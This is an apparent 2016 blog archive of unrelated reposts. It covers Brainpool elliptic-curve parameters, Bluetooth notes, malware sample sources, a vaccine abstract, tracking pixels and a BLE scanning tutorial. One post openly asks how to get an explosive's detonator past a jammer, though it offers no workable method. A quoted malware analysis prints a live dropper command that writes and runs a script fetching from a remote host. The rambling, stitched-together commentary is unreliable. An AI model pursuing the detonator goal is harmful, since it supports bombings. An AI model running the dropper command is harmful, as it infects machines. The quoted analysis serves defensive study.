Saturday, October 1, 2016

The methods for the generation of the parameters and complete security
  proofs regarding the security requirements specified in section 2.1
  are given in [EBP].

3.1 Parameters for 160 bit curves

  Curve-ID: brainpoolP160r1
  p = E95E4A5F737059DC60DFC7AD95B3D8139515620F
  A = 340E7BE2A280EB74E2BE61BADA745D97E8F7C300
  B = 1E589A8595423412134FAA2DBDEC95C8D8675E58
  x = BED5AF16EA3F6A4F62938C4631EB5AF7BDBCDBC3
  y = 1667CB477A1A8EC338F94741669C976316DA6321
  q = E95E4A5F737059DC60DF5991D45029409E60FC09
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP160t1 
  Z = 24DBFF5DEC9B986BBFE5295A29BFBAE45E0F5D0B
  A' = E95E4A5F737059DC60DFC7AD95B3D8139515620C
  B' = 7A556B6DAE535B7B51ED2C4D7DAA7A0B5C55F380
  x = B199B13B9B34EFC1397E64BAEB05ACC265FF2378
  y = ADD6718B7C7C1961F0991B842443772152C9E0AD
  q = E95E4A5F737059DC60DF5991D45029409E60FC09
  h = 1

3.2 Parameters for 192 bit curves

  Curve-ID: brainpoolP192r1
  p = C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86297
  A = 6A91174076B1E0E19C39C031FE8685C1CAE040E5C69A28EF
  B = 469A28EF7C28CCA3DC721D044F4496BCCA7EF4146FBF25C9
  x = C0A0647EAAB6A48753B033C56CB0F0900A2F5C4853375FD6
  y = 14B690866ABD5BB88B5F4828C1490002E6773FA2FA299B8F
  q = C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP192t1
  Z = 1B6F5CC8DB4DC7AF19458A9CB80DC2295E5EB9C3732104CB
  A' = C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86294
  B' = 13D56FFAEC78681E68F9DEB43B35BEC2FB68542E27897B79
  x = 3AE9E58C82F63C30282E1FE7BBF43FA72C446AF6F4618129
  y = 97E2C5667C2223A902AB5CA449D0084B7E5B3DE7CCC01C9
  q = C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1
  h = 1

3.3 Parameters for 224 bit curves

  Curve-ID: brainpoolP224r1
  p = D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FF
  A = 68A5E62CA9CE6C1C299803A6C1530B514E182AD8B0042A59CAD29F43
  B = 2580F63CCFE44138870713B1A92369E33E2135D266DBB372386C400B
  x = D9029AD2C7E5CF4340823B2A87DC68C9E4CE3174C1E6EFDEE12C07D
  y = 58AA56F772C0726F24C6B89E4ECDAC24354B9E99CAA3F6D3761402CD
  q = D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP224t1 
  Z = 2DF271E14427A346910CF7A2E6CFA7B3F484E5C2CCE1C8B730E28B3F
  A' = D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FC
  B' = 4B337D934104CD7BEF271BF60CED1ED20DA14C08B3BB64F18A60888D
  x = 6AB1E344CE25FF3896424E7FFE14762ECB49F8928AC0C76029B4D580
  y = 374E9F5143E568CD23F3F4D7C0D4B1E41C8CC0D1C6ABD5F1A46DB4C
  q = D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F
  h = 1

3.4 Parameters for 256 bit curves

  Curve-ID: brainpoolP256r1
  p = A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5377
  A = 7D5A0975FC2C3057EEF67530417AFFE7FB8055C126DC5C6CE94A4B44F330B5D9
  B = 26DC5C6CE94A4B44F330B5D9BBD77CBF958416295CF7E1CE6BCCDC18FF8C07B6
  x = 8BD2AEB9CB7E57CB2C4B482FFC81B7AFB9DE27E1E3BD23C23A4453BD9ACE3262
  y = 547EF835C3DAC4FD97F8461A14611DC9C27745132DED8E545C1D54C72F046997
  q = A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP256t1
  Z = 3E2D4BD9597B58639AE7AA669CAB9837CF5CF20A2C852D10F655668DFC150EF0
  A' = A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5374
  B' = 662C61C430D84EA4FE66A7733D0B76B7BF93EBC4AF2F49256AE58101FEE92B04
  x = A3E8EB3CC1CFE7B7732213B23A656149AFA142C47AAFBC2B79A191562E1305F4
  y = 2D996C823439C56D7F7B22E14644417E69BCB6DE39D027001DABE8F35B25C9BE
  q = A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7
  h = 1


3.5 Parameters for 320 bit curves

  Curve-ID: brainpoolP320r1
  p =
  D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC28FCD412
  B1F1B32E27
  A =
  3EE30B568FBAB0F883CCEBD46D3F3BB8A2A73513F5EB79DA66190EB085FFA9F492F375
  A97D860EB4
  B =
  520883949DFDBC42D3AD198640688A6FE13F41349554B49ACC31DCCD884539816F5EB4
  AC8FB1F1A6
  x =
  43BD7E9AFB53D8B85289BCC48EE5BFE6F20137D10A087EB6E7871E2A10A599C710AF8D
  0D39E20611
  y =
  14FDD05545EC1CC8AB4093247F77275E0743FFED117182EAA9C77877AAAC6AC7D35245
  D1692E8EE1
  q =
  D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658E9869155
  5B44C59311
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP320t1
  Z =
  15F75CAF668077F7E85B42EB01F0A81FF56ECD6191D55CB82B7D861458A18FEFC3E5AB
  7496F3C7B1
  A' =
  D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC28FCD412
  B1F1B32E24
  B' =
  A7F561E038EB1ED560B3D147DB782013064C19F27ED27C6780AAF77FB8A547CEB5B4FE
  F422340353
  x =
  925BE9FB01AFC6FB4D3E7D4990010F813408AB106C4F09CB7EE07868CC136FFF3357F6
  24A21BED52
  y =
  63BA3A7A27483EBF6671DBEF7ABB30EBEE084E58A0B077AD42A5A0989D1EE71B1B9BC0
  455FB0D2C3
  q =
  D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658E9869155
  5B44C59311
  h = 1

3.6 Parameters for 384 bit curves

  Curve-ID: brainpoolP384r1
  p =
  8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A7
  29901D1A71874700133107EC53
  A =
  7BC382C63D8C150C3C72080ACE05AFA0C2BEA28E4FB22787139165EFBA91F90F8AA581
  4A503AD4EB04A8C7DD22CE2826
  B =
  4A8C7DD22CE28268B39B55416F0447C2FB77DE107DCD2A62E880EA53EEB62D57CB4390
  295DBC9943AB78696FA504C11
  x =
  1D1C64F068CF45FFA2A63A81B7C13F6B8847A3E77EF14FE3DB7FCAFE0CBD10E8E826E0
  3436D646AAEF87B2E247D4AF1E
  y =
  8ABE1D7520F9C2A45CB1EB8E95CFD55262B70B29FEEC5864E19C054FF99129280E4646
  217791811142820341263C5315
  q =
  8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6
  AF6B7FC3103B883202E9046565
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP384t1
  Z =
  41DFE8DD399331F7166A66076734A89CD0D2BCDB7D068E44E1F378F41ECBAE97D2D63D
  BC87BCCDDCCC5DA39E8589291C
  A' =
  8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A7
  29901D1A71874700133107EC50
  B' =
  7F519EADA7BDA81BD826DBA647910F8C4B9346ED8CCDC64E4B1ABD11756DCE1D2074AA
  263B88805CED70355A33B471EE
  x =
  18DE98B02DB9A306F2AFCD7235F72A819B80AB12EBD653172476FECD462AABFFC4FF19
  1B946A5F54D8D0AA2F418808CC
  y =
  25AB056962D30651A114AFD2755AD336747F93475B7A1FCA3B88F2B6A208CCFE469408
  584DC2B2912675BF5B9E582928
  q =
  8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6
  AF6B7FC3103B883202E9046565
  h = 1

3.7 Parameters for 512 bit curves

  Curve-ID: brainpoolP512r1
  p =
  AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B
  009BC66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F3
  A =
  7830A3318B603B89E2327145AC234CC594CBDD8D3DF91610A83441CAEA9863BC2DED5D
  5AA8253AA10A2EF1C98B9AC8B57F1117A72BF2C7B9E7C1AC4D77FC94CA
  B =
  3DF91610A83441CAEA9863BC2DED5D5AA8253AA10A2EF1C98B9AC8B57F1117A72BF2C7
  B9E7C1AC4D77FC94CADC083E67984050B75EBAE5DD2809BD638016F723
  x =
  81AEE4BDD82ED9645A21322E9C4C6A9385ED9F70B5D916C1B43B62EEF4D0098EFF3B1F
  78E2D0D48D50D1687B93B97D5F7C6D5047406A5E688B352209BCB9F822
  y =
  7DDE385D566332ECC0EABFA9CF7822FDF209F70024A57B1AA000C55B881F8111B2DCDE
  494A5F485E5BCA4BD88A2763AED1CA2B2FA8F0540678CD1E0F3AD80892
  q =
  AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C
  414CA92619418661197FAC10471DB1D381085DDADDB58796829CA90069
  h = 1

  #Twisted curve
  Curve-ID: brainpoolP512t1
  Z =
  12EE58E6764838B69782136F0F2D3BA06E27695716054092E60A80BEDB212B64E585D9
  0BCE13761F85C3F1D2A64E3BE8FEA2220F01EBA5EEB0F35DBD29D922AB
  A' =
  AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B
  009BC66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F0
  B' =
  7CBBBCF9441CFAB76E1890E46884EAE321F70C0BCB4981527897504BEC3E36A62BCDFA
  2304976540F6450085F2DAE145C22553B465763689180EA2571867423E
  x =
  640ECE5C12788717B9C1BA06CBC2A6FEBA85842458C56DDE9DB1758D39C0313D82BA51
  735CDB3EA499AA77A7D6943A64F7A3F25FE26F06B51BAA2696FA9035DA
  y =
  5B534BD595F5AF0FA2C892376C84ACE1BB4E3019B71634C01131159CAE03CEE9D99321
  84BEEF216BD71DF2DADF86A627306ECFF96DBB8BACE198B61E00F8B332
  q =
  AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C
  414CA92619418661197FAC10471DB1D381085DDADDB58796829CA90069
  h = 1

4 Object identifiers for the elliptic curve domain parameters

  The root of the tree for the object identifier of the domain
  parameters defined in this specification is given by

     ecStdCurvesAndGeneration OBJECT IDENTIFIER::= {iso(1) 
     identifified-organization(3) teletrust(36) algorithm(3) 
     signature-algorithm(3) ecSign(2) 8}

  The object identifier ellipticCurve represents the tree containing the
  object identifiers for each set of domain parameters specified in this
  RFC. It has the following value:

     ellipticCurve OBJECT IDENTIFIER ::= {ecStdCurvesAndGeneration 1} 
 
http://www.ecc-brainpool.org/download/draft-lochter-pkix-brainpool-ecc-00.txt 

Tuesday, September 27, 2016

Today's subject how to pass trought an explosive without beeing power cut by their jammer! there's two aspects about it, or two ways to face the problem, first one, determine in which frequency is any electric circuit even not connected to a power source transmitting, so we can determine if it can work on other non detected frequency, what is an undetected frequency, not a lower one, or the detonator won't work of course, or else, how to confuse the jammer.

So, we don't want, for begging of conversation a constant frequency, on the electric circuit, and we want that the frequency cellphone they detect have a confusing electronic "agent"...let me post the theory about what I'm saying:

 Many modern microcomputers use a "clock multiplier" which multiplies a lower frequency external clock to the appropriate clock rate of the microprocessor. This allows the CPU to operate at a much higher frequency than the rest of the computer....Some sensitive mixed-signal circuits, such as precision analog-to-digital converters, use sine waves rather than square waves as their clock signals, because square waves contain high-frequency harmonics that can interfere with the analog circuitry and cause noise
 ...Such digital devices work just as well with a clock generator that dynamically changes its frequency, such as spread-spectrum clock generation, dynamic frequency scaling, PowerNow!, Cool'n'Quiet, SpeedStep, etc (wikipedia)

ANOTHER QUESTION THEREFORE IS:


How can a CPU dynamically change its clock frequency?


BUT MUCH MORE IMPORTANT IS TO CONCLUDE THAT THIS MY BE THE TRICKY:


How can I connect multiple bluetooth devices to a single bluetooth device?



 
It is possible within the Bluetooth specification to have a Bluetooth master device connected to multiple slave devices, but there are limits:
     > Prior to Bluetooth spec. rev. 4.1, Slave devices could only be connected to a single piconet at a time. The reason for this is because when the connection is initiated, the advertising device must synchronize it's clock to that of the initiator. So, a slave device cannot be synchronized to two independent free-running clocks at the same time, hence the one master per slave limit. Bluetooth 4.1 addresses this, so a slave device can be connected to two piconets simultaneously, however I don't know the exact details of how.
     > The Bluetooth device you're using must be running a stack that  supports multiple concurrent connections. Many Bluetooth stacks do support this, but there is a limit on how many devices can be connected at the same time, and the limit is usually related to the amount of memory available on the Master device.
     > The type of connection you're using must allow for multiple instances of that connection on a piconet. This is easiest to explain by example. You can only have a single Bluetooth audio connection for music streaming. The reason for this is that the A2DP profile for audio streaming is designed to have only a single connection active at a time. So you cannot connect your smartphone to two Bluetooth speakers at the same time. 
Given all that, you also need an interface to the Bluetooth device that allows you to setup multiple connections. So while this may all be theoretically possible, if the devices interface/software was not designed to allow for  two connections at a time, you're out of luck. 


Monday, September 26, 2016

Malware Sample Sources for Researchers

Malware researchers have the need to collect malware samples to research threat techniques and develop defenses. Researchers can collect such samples using honeypots. They can also download samples from known malicious URLs. They can also obtain malware samples from the following sources:
Be careful not to infect yourself when accessing and experimenting with malicious software!

https://zeltser.com/malware-sample-sources/ 

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario the shellcode would download and execute a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. Droppers’ main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching would probably be process hallowing. Recently we found a couple of curious specimen that does not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of those lately.

One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

 Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://mediafilled.com/?utm_source=48853" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

https://labs.bromium.com/2015/06/12/oh-look-javascript-droppers/ 

Sunday, September 25, 2016

T-cell-inducing vaccines - what's the future ...

SEARCHING FOR IMMORTALITY

Abstract

In the twentieth century vaccine development has moved from the use of attenuated or killed micro-organisms to protein sub-unit vaccines, with vaccine immunogenicity assessed by measuring antibodies induced by vaccination. However, for many infectious diseases T cells are an important part of naturally acquired protective immune responses, and inducing these by vaccination has been the aim of much research. The progress that has been made in developing effective T-cell-inducing vaccines against viral and parasitic diseases such as HIV and malaria is discussed, along with recent developments in therapeutic vaccine development for chronic viral infections and cancer. Although many ways of inducing T cells by vaccination have been assessed, the majority result in low level, non-protective responses. Sufficient clinical research has now been conducted to establish that replication-deficient viral vectored vaccines lead the field in inducing strong and broad responses, and efficacy studies of T-cell-inducing vaccines against a number of diseases are finally demonstrating that this is a valid approach to filling the gaps in our defence against not only infectious disease, but some forms of cancer.
© 2011 The Author. Immunology © 2011 Blackwell Publishing Ltd.

Argo Full Movie

Enigma - Total Eclipse of the Moon

the tracking pixel

A tracking pixel is a graphic that mostly has dimensions of only 1x1 pixels. Thus, it is so small that it can hardly be seen by visitors of a website or email recipients. In order to remain hidden, these tracking pixels are partly or fully designed to be transparent, or camouflaged in the background color of the website. Users are usually not supposed to see the tracking pixel
 The tracking pixel URL is the memory location on the server. When the user visits a website, the image with the tag is loaded from this server


Tracking pixels within the source code might look like this:
 
PART OF THE CODE TO DETECTION:
 
 var extension = (/[.]/.exec(href)) ? /[^.]+$/.exec(href) : undefined;
                    var filePath = href;
                    _gaq.push(['_trackEvent', 'Download', 'Click-' + extension, filePath]);
                    if (jQuery(this).attr('target')

THEY USE THIS PROTOCOL : 

 
Eddystone-UID frame broadcasts


AND THIS TOP LEVEL ESPIONAGE ON BLUETOOTH


BLE

View Source
Step 1
Make a directory inside your "tessel-code" folder: enter mkdir ble into your command line, then change directory into that folder: cd ble
Step 2
Plug the BLE module into Tessel port A with the hexagon/icon side down and the electrical components on the top, then plug Tessel into your computer via USB.
Step 3
Install by typing npm install ble-ble113a into the command line.
Step 4
Save this code in a text file called ble.js:
// Any copyright is dedicated to the Public Domain.
// http://creativecommons.org/publicdomain/zero/1.0/

/*********************************************
This Bluetooth Low Energy module demo scans
for nearby BLE peripherals. Much more fun if
you have some BLE peripherals around.
*********************************************/

var tessel = require('tessel');
var blelib = require('ble-ble113a');

var ble = blelib.use(tessel.port['A']);

ble.on('ready', function(err) {
  console.log('Scanning...');
  ble.startScanning();
});

ble.on('discover', function(peripheral) {
  console.log("Discovered peripheral!", peripheral.toString());
});
Step 5
In your command line, tessel run ble.js
Set a Bluetooth Low Energy device to advertising and see if Tessel can find it!

Bonus: Change the code to print out only the address of discovered peripherals.

To see what else you can do with the BLE module, see the module docs here.


http://start.tessel.io/modules/ble 

Cyber hack SHA256 HMAC read/ write decoder